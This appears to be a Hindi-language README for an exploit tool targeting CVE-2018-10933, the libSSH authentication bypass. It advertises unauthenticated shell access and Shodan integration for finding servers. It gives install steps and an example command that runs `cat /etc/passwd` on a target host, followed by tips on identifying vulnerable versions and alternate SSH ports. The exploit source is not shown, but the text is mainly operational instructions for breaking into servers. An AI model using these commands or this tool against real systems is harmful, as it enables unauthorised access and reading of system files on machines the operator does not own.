
CVE-2018-10933 (LibSSH प्रमाणीकरण बाईपास) के लिए शोषण जो कमजोर SSH सर्वरों पर बिना प्रमाणीकरण के शेल एक्सेस सक्षम करता है, जिसमें संस्करण पहचान और Shodan एकीकरण शामिल है।
CVE-2018-10933 का उपयोग करके बिना किसी क्रेडेंशियल के शेल तक पहुँच प्राप्त करें
Exploit-DB : https://www.exploit-db.com/exploits/45638
libSSH द्वारा CVE-2018-10933 के बारे में जानकारी : https://www.libssh.org/security/advisories/CVE-2018-10933.txt
libSSH द्वारा बगफिक्स रिलीज़ : https://www.libssh.org/2018/10/16/libssh-0-8-4-and-0-7-6-security-and-bugfix-release/
// If paramiko==2.0.8 doesn't works try : pip install paramiko==2.4.2
pip install -r requirements.txt
python libsshauthbypass.py --help
उदाहरण:
python libsshauthbypass.py --host 0.0.0.0 --port 22 --command "cat /etc/passwd" --logfile newlogfile.log
यदि आउटपुट 0.7.5, 0.6.*, या उससे कम है तो सर्वर असुरक्षित है।
यदि नहीं है तो संभवतः यह पैच किया गया है, छोटा किया गया है या libSSH का उपयोग नहीं कर रहा है।
( पोर्ट 22 डिफ़ॉल्ट है, अन्य पोर्ट जैसे (2222, 3333, 4444) में libSSH शामिल हो सकता है )
